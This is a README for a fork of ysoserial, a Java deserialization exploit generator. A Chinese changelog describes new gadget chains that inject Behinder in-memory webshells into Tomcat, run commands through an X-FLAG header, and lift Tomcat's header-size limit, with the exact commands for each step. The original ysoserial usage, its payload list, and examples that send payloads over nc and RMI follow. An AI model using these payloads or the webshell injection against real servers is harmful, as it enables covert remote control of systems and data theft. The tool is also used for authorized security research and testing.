新改动

2021.4.23

1. 由于冰蝎的更新,不再需要behinder-clone,使用Behinder_v3.0 Beta 10可以直接进行连接
2. fix shellInject bug

   2021.4.22

3. 优化了内存webshell的逻辑,注入后的webshell访问路径和密码有关,为/md5(pass)[0:16],如密码为pass,则路径为/1a1dc91c907325c6,之前内存马注册路径存在bug,导致没有注册到第一filter
4. 更新了CommonsBeanutils1,参考CommonsBeanutils与无commons-collections的Shiro反序列化利用
5. 更新了Echo2系列的payload,使用X-FLAG头来执行命令,例如需要执行ls 则headers={"tomcat": "tomcat","X-FLAG: ls"}
6. 删除了header系列

   添加了Tomcat8+支持冰蝎的内存webshell的注入，仅供测试使用 支持的链：

   • CommonsBeanutils1(CommonsBeanutils1TomcatShell,CommonsBeanutils1ShellInject)
   • CommonsCollections2(CommonsCollections2ShellInject,CommonsCollections2TomcatShell)
   • CommonsCollections3(CommonsCollections3ShellInject,CommonsCollections3TomcatShell)
   • CommonsCollections4(CommonsCollections4ShellInject,CommonsCollections4TomcatShell)
   • ROME(ROMEShellInject,ROMETomcatShell)

用法：

1. 注入需要利用的Filter,pass为内存webshell连接的密码

   java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1TomcatShell "pass"

2. 将Filter注册到应用中

   java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1ShellInject "pass"

3. 使用修改过的冰蝎进行连接，（需要填写自定义请求头为tomcat: tomcat)

添加了Tomcat回显的方式 Tomcat 7.x 目前不行新增对于Tomcat8.0.x低版本的适配（未测试所有版本，有版本测试未成功可以联系）， 优化了payload的大小，不用再进行改变限制header大小的操作了

新添的链

• CommonsBeanutils1TomcatHeader（用于解除tomcat对于request header的大小限制）
• CommonsBeanutils1TomcatEcho2
• CommonsCollections2TomcatEcho2
• CommonsCollections2TomcatHeader（用于解除tomcat对于request header的大小限制）
• CommonsCollections3TomcatEcho2
• CommonsCollections4TomcatEcho2
• Rome

编译时直接跳过tests

mvn package -DskipTests

生成回显payload，打回显的payload时记得要在request添加上 tomcat: tomcat

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2TomcatEcho2 "whoami"

改变tomcat header限制，注意使用对应gadget对应的payload，目前更新已不再需要多线程发包了，打一次即可

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar  CommonsBeanutils1TomcatHeader 16000

关于Weblogic2555以及TomcatEcho1的相关利用参见https://github.com/kingkaki/ysoserial

ysoserial

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

Description

Originally released as part of AppSecCali 2015 Talk "Marshalling Pickles: how deserializing objects will ruin your day" with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). Later updated to include additional gadget chains for JRE <= 1.7u21 and several other libraries.

ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath.

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Usage

$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
  Available payload types:
     Payload             Authors                     Dependencies
     -------             -------                     ------------
     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5
     C3P0                @mbechler                   c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Clojure             @JackOfMostTrades           clojure:1.8.0
     CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                    commons-collections:3.1
     CommonsCollections2 @frohoff                    commons-collections4:4.0
     CommonsCollections3 @frohoff                    commons-collections:3.1
     CommonsCollections4 @frohoff                    commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
     CommonsCollections6 @matthias_kaiser            commons-collections:3.1
     FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                    groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser            javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                   json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser            javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711 jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser            js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                   rome:1.0
     Spring1             @frohoff                    spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                   spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Wicket1             @jacob-baines               wicket-util:6.23.0, slf4j-api:1.6.4

Examples

$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

Installation

1. Download the latest jar from JitPack

Note that GitHub-hosted releases were removed in compliance with the GitHub Community Guidelines

Building

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

Code Status

Contributing

1. Fork it
2. Create your feature branch (git checkout -b my-new-feature)
3. Commit your changes (git commit -am 'Add some feature')
4. Push to the branch (git push origin my-new-feature)
5. Create new Pull Request

See Also

• Java-Deserialization-Cheat-Sheet: info on vulnerabilities, tools, blogs/write-ups, etc.
• marshalsec: similar project for various Java deserialization formats/libraries
• ysoserial.net: similar project for .NET deserialization